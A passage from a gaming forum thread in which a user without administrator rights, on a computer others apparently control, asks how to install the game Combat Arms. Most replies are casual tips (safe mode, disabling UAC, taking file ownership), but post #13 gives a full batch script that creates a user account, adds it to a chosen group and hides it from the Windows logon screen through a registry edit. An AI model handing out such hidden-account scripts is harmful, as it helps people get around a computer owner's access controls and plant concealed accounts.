Page 1 of 4 123 ... LastLast
Results 1 to 15 of 57
  1. #1
    Acidic's Avatar
    Join Date
    Sep 2011
    Gender
    male
    Location
    teh interwebs
    Posts
    3,129
    Reputation
    41
    Thanks
    117
    My Mood
    Sneaky

    Install and run CA without admin

    Well I could go into a long story of why I don't have access to an admin account but i won't
    I obviously have a Internet to download it but it won't let me install it
    Any ideas?

    successful trades:
    killingspirit, Zeus, Bubbles, BigNuts, IPhone4S, BurnRed, PooPoo12345, kolec94, Nexon, TJBRocker, xXBrokenBonezXx

    Current Games:

    MW3, Black Ops 2, TF2

    Total money spent buying CA accounts:

    200 Dollars

    Total money on CA:

    755 Dollars

  2. #2
    [SMA] Paradise`'s Avatar
    Join Date
    Nov 2011
    Gender
    male
    Location
    NOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOBNOOB
    Posts
    8,932
    Reputation
    1727
    Thanks
    2,978
    My Mood
    Amused
    To install a program you need permission from admin thats why its all administrator, downloading and installing are two different things..

    Refund Services Still RESUMED!

  3. #3
    Acidic's Avatar
    Join Date
    Sep 2011
    Gender
    male
    Location
    teh interwebs
    Posts
    3,129
    Reputation
    41
    Thanks
    117
    My Mood
    Sneaky
    Quote Originally Posted by DTX.exe View Post
    To install a program you need permission from admin thats why its all administrator, downloading and installing are two different things..
    Yeah I know...
    I need to find a way to install CA without admin, if it's possible

    successful trades:
    killingspirit, Zeus, Bubbles, BigNuts, IPhone4S, BurnRed, PooPoo12345, kolec94, Nexon, TJBRocker, xXBrokenBonezXx

    Current Games:

    MW3, Black Ops 2, TF2

    Total money spent buying CA accounts:

    200 Dollars

    Total money on CA:

    755 Dollars

  4. #4
    kolec94's Avatar
    Join Date
    Nov 2010
    Gender
    male
    Location
    Davenport,IA
    Posts
    1,784
    Reputation
    2
    Thanks
    104
    u can use safe mode


  5. #5
    Toshiro Hitsugaya's Avatar
    Join Date
    Jan 2012
    Gender
    male
    Location
    Soul Society
    Posts
    221
    Reputation
    -16
    Thanks
    8
    My Mood
    Cold
    Quote Originally Posted by lp98 View Post
    Yeah I know...
    I need to find a way to install CA without admin, if it's possible
    Can you take a SS?
    Try running CCleaner then trying.

  6. #6
    Acidic's Avatar
    Join Date
    Sep 2011
    Gender
    male
    Location
    teh interwebs
    Posts
    3,129
    Reputation
    41
    Thanks
    117
    My Mood
    Sneaky
    Quote Originally Posted by kolec94 View Post
    u can use safe mode
    Explain please

    ---------- Post added at 07:23 PM ---------- Previous post was at 07:22 PM ----------

    Quote Originally Posted by Toshiro Hitsugaya View Post

    Can you take a SS?
    Try running CCleaner then trying.
    well im on my iPad right now so no
    But the error I get when I try to install CA is something like "you need Admin rights to continue"

    successful trades:
    killingspirit, Zeus, Bubbles, BigNuts, IPhone4S, BurnRed, PooPoo12345, kolec94, Nexon, TJBRocker, xXBrokenBonezXx

    Current Games:

    MW3, Black Ops 2, TF2

    Total money spent buying CA accounts:

    200 Dollars

    Total money on CA:

    755 Dollars

  7. #7
    Pheles's Avatar
    Join Date
    Aug 2008
    Gender
    male
    Posts
    1,080
    Reputation
    46
    Thanks
    49
    My Mood
    Bored
    You can edit your administrator right by right clicking Combat Arms and going to security and giving it rights as administrator. Just a thought, not sure if it would work
    ... hi


     

  8. #8
    Acidic's Avatar
    Join Date
    Sep 2011
    Gender
    male
    Location
    teh interwebs
    Posts
    3,129
    Reputation
    41
    Thanks
    117
    My Mood
    Sneaky
    Quote Originally Posted by Pheles View Post
    You can edit your administrator right by right clicking Combat Arms and going to security and giving it rights as administrator. Just a thought, not sure if it would work
    I'll try later but I doubt it's that easy

    successful trades:
    killingspirit, Zeus, Bubbles, BigNuts, IPhone4S, BurnRed, PooPoo12345, kolec94, Nexon, TJBRocker, xXBrokenBonezXx

    Current Games:

    MW3, Black Ops 2, TF2

    Total money spent buying CA accounts:

    200 Dollars

    Total money on CA:

    755 Dollars

  9. #9
    kolec94's Avatar
    Join Date
    Nov 2010
    Gender
    male
    Location
    Davenport,IA
    Posts
    1,784
    Reputation
    2
    Thanks
    104
    takturn down ur uac
    take ownership of the file
    run as admin
    is it the download clinet or the actually combat arms install?
    @lp98
    Last edited by kolec94; 01-09-2012 at 05:49 PM.


  10. #10
    Pheles's Avatar
    Join Date
    Aug 2008
    Gender
    male
    Posts
    1,080
    Reputation
    46
    Thanks
    49
    My Mood
    Bored
    Quote Originally Posted by lp98 View Post
    I'll try later but I doubt it's that easy
    Did you say your trying to install Combat Arms on your iPad 2?
    ... hi


     

  11. #11
    Acidic's Avatar
    Join Date
    Sep 2011
    Gender
    male
    Location
    teh interwebs
    Posts
    3,129
    Reputation
    41
    Thanks
    117
    My Mood
    Sneaky
    Quote Originally Posted by kolec94 View Post
    takturn down ur uac
    take ownership of the file
    run as admin
    is it the download clinet or the actually combat arms install?
    @lp98
    It's the actual file that you need to install, the client was blocked by my firewall

    ---------- Post added at 09:22 PM ---------- Previous post was at 09:21 PM ----------

    Quote Originally Posted by Pheles View Post
    Did you say your trying to install Combat Arms on your iPad 2?
    No lol
    That's impossible, right?

    successful trades:
    killingspirit, Zeus, Bubbles, BigNuts, IPhone4S, BurnRed, PooPoo12345, kolec94, Nexon, TJBRocker, xXBrokenBonezXx

    Current Games:

    MW3, Black Ops 2, TF2

    Total money spent buying CA accounts:

    200 Dollars

    Total money on CA:

    755 Dollars

  12. #12
    Lehsyrus's Avatar
    Join Date
    Aug 2009
    Gender
    male
    Location
    Jersey
    Posts
    10,899
    Reputation
    1281
    Thanks
    3,064
    Quote Originally Posted by Toshiro Hitsugaya View Post

    Can you take a SS?
    Try running CCleaner then trying.
    His computer has UAC on it, and he doesn't have Administrative rights.

  13. #13
    aeronyx's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Location
    /210/
    Posts
    11,238
    Reputation
    1211
    Thanks
    4,972
    [FONT="Lucida Sans Unicode"][COLOR="DarkSlateGray"][SIZE="2"]@lp98

    Try this:

    Code:
    @EcHo off
    TITLE Admin Account Creator (sodaDome.com)
    COLOR 0f
    set AC_PART=001
    :HEADER
    echo.
    ECHO [INFO]
    ECHO [-] Create a hidden user acount (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% )
    echo \
    GOTO %AC_PART%
     
     
    :001
    SET /P AC_NAME=[*] Account name? :
    cls
    SET AC_PART=002
    GOTO HEADER
     
     
    :002
    SET /P AC_PASS=[*] Account password? :
    cls
    SET AC_PART=003
    GOTO HEADER
     
    :003
    SET /P AC_COMMENT=[*] Account Comment? :
    cls
    SET AC_PART=004
    GOTO HEADER
     
     
    :004
    ECHO [* The following groups are available on the machine.
    ECHO.
    net localgroup | find "*"
    ECHO.
    SET /P AC_GROUP=[*] Group? :
    cls
    SET AC_PART=005
    GOTO HEADER
     
     
    :005
    SET /P AC_OK=[*] Creating acount now, Continue? (y/n) :
    IF NOT %AC_OK%==y GOTO 0051
    net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%"
    net localgroup "%AC_GROUP%" %AC_NAME% /add
    ECHO.
    pause
     
    :0051
    cls
    SET AC_PART=006
    GOTO HEADER
     
     
    :006
    SET /P AC_HIDE=[*] Do you want to hide the account from the logon screen? (y/n) :
    IF NOT %AC_HIDE%==y GOTO END
    echo Windows Registry Editor Version 5.00>%TEMP%\addregistry.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
     
    NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%TEMP%\addregistry.reg
    echo "%AC_NAME%"=dword:00000000>>%TEMP%\addregistry.reg
    Regedit /s %TEMP%\addregistry.reg
    Del %TEMP%\addregistry.reg
    :END
    ECHO.
    pause
    Copy and paste into notepad and save as .bat

    Credits to @Sam

  14. #14
    Toshiro Hitsugaya's Avatar
    Join Date
    Jan 2012
    Gender
    male
    Location
    Soul Society
    Posts
    221
    Reputation
    -16
    Thanks
    8
    My Mood
    Cold
    Quote Originally Posted by Lehsyrus View Post


    His computer has UAC on it, and he doesn't have Administrative rights.
    Then who does have admin on his PC?

  15. #15
    Lehsyrus's Avatar
    Join Date
    Aug 2009
    Gender
    male
    Location
    Jersey
    Posts
    10,899
    Reputation
    1281
    Thanks
    3,064
    Quote Originally Posted by Toshiro Hitsugaya View Post

    Then who does have admin on his PC?
    His parents, brother, sister, anyone could. Not everyone on this forum owns their computer

Page 1 of 4 123 ... LastLast

Similar Threads

  1. Windows 7 running without admin prompt??? :(
    By kutzki in forum Combat Arms Help
    Replies: 2
    Last Post: 08-28-2010, 05:50 PM
  2. [Tutorial] Running Combat Arms WITHOUT admin.
    By mnpeepno2 in forum Combat Arms Hacks & Cheats
    Replies: 61
    Last Post: 02-15-2010, 08:23 PM
  3. [request] how to download, install and run korean warrock.
    By blackdrag0 in forum WarRock Korea Hacks
    Replies: 12
    Last Post: 07-17-2007, 04:14 AM
  4. war rock hacks: how u get them up and running?
    By loopdedoo1 in forum WarRock - International Hacks
    Replies: 6
    Last Post: 05-22-2007, 05:05 PM
  5. Is PB Back Up And Running?
    By gino666 in forum WarRock - International Hacks
    Replies: 2
    Last Post: 02-19-2007, 05:38 PM